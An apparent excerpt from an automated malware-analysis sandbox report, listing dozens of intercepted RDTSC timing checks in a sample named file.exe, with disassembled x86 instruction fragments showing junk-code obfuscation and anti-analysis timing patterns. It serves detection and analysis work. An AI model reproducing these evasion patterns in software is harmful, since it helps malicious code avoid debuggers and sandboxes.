Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5783F0 second address: 578414 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A5Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578414 second address: 578428 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C60h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578428 second address: 57842E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5789C0 second address: 578A3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b je 00007FD000CC0C62h 0x00000011 je 00007FD000CC0C5Ch 0x00000017 jng 00007FD000CC0C56h 0x0000001d nop 0x0000001e sub dword ptr [ebp+122D1C72h], ebx 0x00000024 push 00000000h 0x00000026 mov di, si 0x00000029 mov di, si 0x0000002c push 00000000h 0x0000002e push 00000000h 0x00000030 push ecx 0x00000031 call 00007FD000CC0C58h 0x00000036 pop ecx 0x00000037 mov dword ptr [esp+04h], ecx 0x0000003b add dword ptr [esp+04h], 00000017h 0x00000043 inc ecx 0x00000044 push ecx 0x00000045 ret 0x00000046 pop ecx 0x00000047 ret 0x00000048 jng 00007FD000CC0C6Ah 0x0000004e call 00007FD000CC0C60h 0x00000053 mov di, cx 0x00000056 pop esi 0x00000057 mov dword ptr [ebp+122D1FFFh], ebx 0x0000005d xchg eax, ebx 0x0000005e jc 00007FD000CC0C62h 0x00000064 jc 00007FD000CC0C5Ch 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 578A3C second address: 578A54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jg 00007FD001095A56h 0x0000000d jp 00007FD001095A56h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5792A2 second address: 5792BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD000CC0C66h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57A316 second address: 57A38A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FD001095A56h 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d popad 0x0000000e pop eax 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 push 00000000h 0x00000015 push ebp 0x00000016 call 00007FD001095A58h 0x0000001b pop ebp 0x0000001c mov dword ptr [esp+04h], ebp 0x00000020 add dword ptr [esp+04h], 0000001Dh 0x00000028 inc ebp 0x00000029 push ebp 0x0000002a ret 0x0000002b pop ebp 0x0000002c ret 0x0000002d mov edi, 7C6353F3h 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FD001095A58h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 0000001Ah 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e push 00000000h 0x00000050 jnc 00007FD001095A5Ah 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 pushad 0x00000059 push esi 0x0000005a pop esi 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57ADE2 second address: 57AE05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jbe 00007FD000CC0C60h 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57AABD second address: 57AAC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57AAC1 second address: 57AAC5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57AAC5 second address: 57AACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57AACB second address: 57AAE1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD000CC0C5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57B5C5 second address: 57B5CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57AAE1 second address: 57AAE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57B80C second address: 57B87C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007FD001095A62h 0x00000010 jmp 00007FD001095A5Ch 0x00000015 popad 0x00000016 mov dword ptr [esp], eax 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FD001095A58h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 js 00007FD001095A58h 0x00000039 mov esi, ecx 0x0000003b push 00000000h 0x0000003d mov di, FFFCh 0x00000041 push 00000000h 0x00000043 jmp 00007FD001095A61h 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push esi 0x0000004c jns 00007FD001095A56h 0x00000052 pop esi 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57B5CB second address: 57B5E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jp 00007FD000CC0C64h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57AAE6 second address: 57AB04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD001095A69h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57B5E7 second address: 57B5EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D9E3 second address: 57D9E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D9E7 second address: 57D9ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57D9ED second address: 57DA43 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD001095A67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push 00000000h 0x00000010 push ebp 0x00000011 call 00007FD001095A58h 0x00000016 pop ebp 0x00000017 mov dword ptr [esp+04h], ebp 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc ebp 0x00000024 push ebp 0x00000025 ret 0x00000026 pop ebp 0x00000027 ret 0x00000028 push 00000000h 0x0000002a mov dword ptr [ebp+122D1B68h], edx 0x00000030 xchg eax, ebx 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jng 00007FD001095A56h 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57DA43 second address: 57DA4F instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 pushad 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58184E second address: 581852 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581852 second address: 581858 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 581858 second address: 58185F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5829E4 second address: 5829E9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5829E9 second address: 582A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D1AF5h], edi 0x0000000e sbb di, 78C7h 0x00000013 push 00000000h 0x00000015 mov edi, 26104D06h 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FD001095A58h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000017h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 jmp 00007FD001095A68h 0x0000003b mov edi, dword ptr [ebp+12467085h] 0x00000041 xchg eax, esi 0x00000042 push eax 0x00000043 push edx 0x00000044 pushad 0x00000045 jne 00007FD001095A56h 0x0000004b push eax 0x0000004c push edx 0x0000004d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 582A4E second address: 582A53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 582A53 second address: 582A69 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jbe 00007FD001095A56h 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edi 0x0000000e push eax 0x0000000f push edx 0x00000010 jg 00007FD001095A56h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 582A69 second address: 582A6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 57E2C8 second address: 57E2D2 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5809CC second address: 5809D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5809D2 second address: 5809D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 585FFD second address: 58604B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C62h 0x00000009 popad 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FD000CC0C58h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 movsx ebx, di 0x0000002a push 00000000h 0x0000002c mov ebx, esi 0x0000002e xchg eax, esi 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 js 00007FD000CC0C56h 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58604B second address: 586065 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jno 00007FD001095A5Ch 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5862DE second address: 5862F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 535533 second address: 53553F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007FD001095A56h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 53553F second address: 535543 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58B904 second address: 58B9C7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 pushad 0x00000009 jno 00007FD001095A5Ch 0x0000000f jmp 00007FD001095A67h 0x00000014 popad 0x00000015 nop 0x00000016 jmp 00007FD001095A62h 0x0000001b push 00000000h 0x0000001d jmp 00007FD001095A66h 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push eax 0x00000027 call 00007FD001095A58h 0x0000002c pop eax 0x0000002d mov dword ptr [esp+04h], eax 0x00000031 add dword ptr [esp+04h], 0000001Ah 0x00000039 inc eax 0x0000003a push eax 0x0000003b ret 0x0000003c pop eax 0x0000003d ret 0x0000003e mov dword ptr [ebp+122D1DA7h], eax 0x00000044 mov dword ptr [ebp+12465B64h], edi 0x0000004a xchg eax, esi 0x0000004b pushad 0x0000004c pushad 0x0000004d jng 00007FD001095A56h 0x00000053 jmp 00007FD001095A69h 0x00000058 popad 0x00000059 push ebx 0x0000005a ja 00007FD001095A56h 0x00000060 pop ebx 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FD001095A5Ch 0x0000006b jnl 00007FD001095A56h 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58CAF2 second address: 58CAF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58CAF7 second address: 58CB24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD001095A5Ch 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A67h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58BACE second address: 58BB58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD000CC0C58h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 0000001Ah 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 mov edi, dword ptr [ebp+122D2ECFh] 0x00000029 push dword ptr fs:[00000000h] 0x00000030 pushad 0x00000031 mov ax, bx 0x00000034 mov ecx, dword ptr [ebp+122D1F65h] 0x0000003a popad 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 mov bx, cx 0x00000045 jg 00007FD000CC0C57h 0x0000004b mov eax, dword ptr [ebp+122D15C9h] 0x00000051 sbb ebx, 5EF8C6ADh 0x00000057 push FFFFFFFFh 0x00000059 push 00000000h 0x0000005b push ebx 0x0000005c call 00007FD000CC0C58h 0x00000061 pop ebx 0x00000062 mov dword ptr [esp+04h], ebx 0x00000066 add dword ptr [esp+04h], 00000014h 0x0000006e inc ebx 0x0000006f push ebx 0x00000070 ret 0x00000071 pop ebx 0x00000072 ret 0x00000073 mov ebx, dword ptr [ebp+122D2D77h] 0x00000079 nop 0x0000007a push eax 0x0000007b push edx 0x0000007c pushad 0x0000007d push eax 0x0000007e push edx 0x0000007f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58BB58 second address: 58BB63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FD001095A56h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58BB63 second address: 58BB69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58AB3A second address: 58AB40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58DD73 second address: 58DD94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C67h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58DD94 second address: 58DD9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58DD9A second address: 58DD9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58EDCF second address: 58EE01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FD001095A66h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD001095A62h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590CA1 second address: 590CBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD000CC0C66h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58FD55 second address: 58FD59 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590CBC second address: 590D2A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD000CC0C63h 0x0000000e nop 0x0000000f push 00000000h 0x00000011 push esi 0x00000012 call 00007FD000CC0C58h 0x00000017 pop esi 0x00000018 mov dword ptr [esp+04h], esi 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc esi 0x00000025 push esi 0x00000026 ret 0x00000027 pop esi 0x00000028 ret 0x00000029 mov bx, CE7Fh 0x0000002d sub dword ptr [ebp+122D239Bh], edi 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D3ADAh], esi 0x0000003b push 00000000h 0x0000003d jmp 00007FD000CC0C5Ah 0x00000042 xchg eax, esi 0x00000043 push edi 0x00000044 push edx 0x00000045 js 00007FD000CC0C56h 0x0000004b pop edx 0x0000004c pop edi 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 pushad 0x00000054 popad 0x00000055 popad 0x00000056 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 58FE58 second address: 58FE5F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591C42 second address: 591C48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591C48 second address: 591CB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c call 00007FD001095A58h 0x00000011 pop eax 0x00000012 mov dword ptr [esp+04h], eax 0x00000016 add dword ptr [esp+04h], 00000019h 0x0000001e inc eax 0x0000001f push eax 0x00000020 ret 0x00000021 pop eax 0x00000022 ret 0x00000023 sub dword ptr [ebp+122D3A31h], edi 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FD001095A58h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 0000001Ah 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 push ecx 0x00000046 or dword ptr [ebp+122D3A5Bh], edx 0x0000004c pop ebx 0x0000004d mov di, D602h 0x00000051 push 00000000h 0x00000053 push eax 0x00000054 pushad 0x00000055 push eax 0x00000056 push edx 0x00000057 push ecx 0x00000058 pop ecx 0x00000059 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591CB0 second address: 591CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590E6B second address: 590EE5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD001095A5Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d add ebx, 2BA3B991h 0x00000013 push dword ptr fs:[00000000h] 0x0000001a mov dword ptr [ebp+122D364Eh], eax 0x00000020 mov dword ptr fs:[00000000h], esp 0x00000027 call 00007FD001095A5Bh 0x0000002c mov ebx, eax 0x0000002e pop ebx 0x0000002f mov eax, dword ptr [ebp+122D133Dh] 0x00000035 push 00000000h 0x00000037 push eax 0x00000038 call 00007FD001095A58h 0x0000003d pop eax 0x0000003e mov dword ptr [esp+04h], eax 0x00000042 add dword ptr [esp+04h], 0000001Ah 0x0000004a inc eax 0x0000004b push eax 0x0000004c ret 0x0000004d pop eax 0x0000004e ret 0x0000004f mov ebx, 742E4FF6h 0x00000054 mov dword ptr [ebp+12458E47h], edx 0x0000005a push FFFFFFFFh 0x0000005c mov bx, 1C00h 0x00000060 push eax 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 push esi 0x00000065 pop esi 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591CB4 second address: 591CBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590EE5 second address: 590EF7 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD001095A56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007FD001095A56h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591CBE second address: 591CC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 590EF7 second address: 590EFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 591EEA second address: 591EEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 599B29 second address: 599B45 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FD001095A58h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007FD001095A5Dh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 599402 second address: 599407 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 599407 second address: 599412 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59955C second address: 599572 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD000CC0C5Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 599572 second address: 599576 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 599576 second address: 599586 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD000CC0C56h 0x00000008 jng 00007FD000CC0C56h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 5996F4 second address: 5996F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59CB8F second address: 59CB93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59CB93 second address: 59CB9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59CB9F second address: 59CBA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 59CBA3 second address: 59CBA9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
